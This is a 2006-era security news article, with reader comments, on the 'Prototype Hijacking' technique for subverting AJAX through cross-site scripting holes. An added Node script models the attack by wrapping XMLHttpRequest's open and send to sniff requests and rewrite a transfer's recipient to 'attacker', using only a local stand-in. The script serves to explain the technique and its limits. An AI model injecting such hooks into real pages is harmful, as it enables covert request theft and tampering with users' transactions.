Might "Prototype Hijacking" Subvert AJAX?

New ploy exploits sites with cross-site scripting holes

(SYS-CON Media) – Does JavaScript, which was never designed to do anything resembling what it now does under the approach called AJAX, have a fundamental design flaw? That is the question posed by Stefano Di Paola and Giorgio Fedon. Using a technique they call "Prototype Hijacking," Di Paola and Fedon claim to have shown that the asynchronous requests a browser makes can be sniffed and manipulated in real time, transparently to the page and independently of the AJAX framework in use.

Their paper, "Subverting AJAX," was written for the 23rd Chaos Communication Conference, held at the Berliner Congress Center from 27 to 30 December 2006. The conference maintained a weblog (23C3 Weblog).

The authors (Di Paola describes himself as a senior security engineer; Fedon is employed as a senior security consultant and penetration tester at Emaze Networks) close with the following thought, in somewhat broken English:

"As it seems, Web 2.0 applications will be more and more tightly tied to browser security, that is increasing in complexity and has to take care of a plethora of features that can be turned into weapons if controlled by a malicious attacker."

They go on to describe what they call "a very interesting cache-injection technique": by abusing the way asynchronous requests are made, an attacker can poison, almost permanently, the copies of visited web sites that the browser keeps in its cache.

They also describe a new type of attack that bypasses even "restrictions imposed by web sites not vulnerable to XSS."

Experts, however, are not convinced. One, who checked the Opera, Safari and (Gecko-based) Camino browsers and wrote up the results on Slashdot, reports that they all "have completely separate sets of prototypes for each frame, so you can't circumvent XSS protection using prototypes."

As the Slashdot poster comments: "So it seems there's nothing to get excited about - you must have exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet."
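The following Node script is an added illustration, not code from the paper or from this article. It models the prototype-hijacking idea described above (wrapping the XMLHttpRequest prototype's open() and send() so that requests are sniffed and rewritten without the calling framework noticing) and, alongside it, the Slashdot poster's point that each frame has its own set of prototypes, so a hijack only reaches code running in the frame where the XSS hole is. Node has no XMLHttpRequest, so a minimal stand-in is constructed here; makeFrame(), makeClient(), hijack(), the transfer endpoint and the request payload are all assumptions made for the demo.

```javascript
// Added example (not from the paper or the article): a model of prototype
// hijacking against XMLHttpRequest, runnable under Node.
// Node has no XMLHttpRequest, so the stand-in below is constructed here to
// play the browser's object. Each call to makeFrame() returns a fresh
// constructor/prototype pair, modelling a browser frame with its own set of
// prototypes (the point raised by the Slashdot poster).

function makeFrame() {
  // Stand-in XHR: instead of touching the network it answers every send()
  // by echoing back what it was asked to send.
  class XMLHttpRequest {
    open(method, url) {
      this.method = method;
      this.url = url;
    }
    setRequestHeader(name, value) {
      if (!this.headers) this.headers = {};
      this.headers[name] = value;
    }
    send(body) {
      this.responseText = JSON.stringify({
        method: this.method,
        url: this.url,
        body: body === undefined ? null : body,
      });
      if (typeof this.onload === 'function') this.onload();
    }
  }
  return { XMLHttpRequest };
}

// Ordinary page/framework code: a JSON POST helper such as any AJAX library
// ships. It never notices the hijack because it only uses the public XHR API.
function makeClient(frame) {
  return function postJson(url, payload) {
    const xhr = new frame.XMLHttpRequest();
    xhr.open('POST', url);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.send(JSON.stringify(payload));
    return JSON.parse(xhr.responseText);
  };
}

// Attacker payload, assumed to run through an XSS hole in the same frame:
// wrap the prototype's open() and send() so every request made in this frame
// is copied into `log` (sniffing) and optionally rewritten before it leaves
// (manipulation). Callers keep using what looks like an untouched XHR.
function hijack(frame, log, rewrite) {
  const proto = frame.XMLHttpRequest.prototype;
  const origOpen = proto.open;
  const origSend = proto.send;
  proto.open = function (method, url, ...rest) {
    this._hijackedUrl = url; // remember the target for send()
    return origOpen.call(this, method, url, ...rest);
  };
  proto.send = function (body) {
    log.push({ url: this._hijackedUrl, body }); // sniff
    const altered = rewrite ? rewrite(this._hijackedUrl, body) : body; // manipulate
    return origSend.call(this, altered);
  };
}

// Demo: two frames, only one of them carrying the XSS hole. The transfer
// endpoint and payload are invented for the demo.
function demo() {
  const frameA = makeFrame(); // frame where the attacker's script runs
  const frameB = makeFrame(); // unrelated frame with its own prototypes

  const sniffed = [];
  hijack(frameA, sniffed, (url, body) => {
    const data = JSON.parse(body);
    if (url.endsWith('/transfer')) data.to = 'attacker'; // redirect the money
    return JSON.stringify(data);
  });

  const postA = makeClient(frameA);
  const postB = makeClient(frameB);
  const echoedA = postA('/api/transfer', { to: 'alice', amount: 10 });
  const echoedB = postB('/api/transfer', { to: 'alice', amount: 10 });

  return {
    sniffed,                             // what the attacker captured
    sentFromA: JSON.parse(echoedA.body), // what actually left frame A
    sentFromB: JSON.parse(echoedB.body), // frame B is unaffected
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the request from the hijacked frame leaving with `to` rewritten to "attacker" while the attacker's log holds the original body, and the identical request from the other frame leaving untouched. Two caveats on the model: a real payload would normally also hook the response path (onreadystatechange and responseText) to read replies, which is left out here, and the separate-frame isolation only helps when the attacker cannot inject script into the target frame in the first place, which is exactly the Slashdot poster's point.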

More Stories By Security News Desk

SYS-CON's Security News desk trawls the world of security for news of software, hardware, products, and services that seems likely to be of interest to infosec professionals and summarizes them for easy assimilation by busy IT managers and staff.

Most Recent Comments
stonecypher 01/07/07 07:08:10 AM EST

The fundamental flaw is not in Javascript. It's in current implementations of Javascript.

netsharc 01/07/07 06:36:47 AM EST

The problem isn't that the use of Ajax (or XmlHttpRequest) itself is harmful; the problem is that XSS holes are harmful!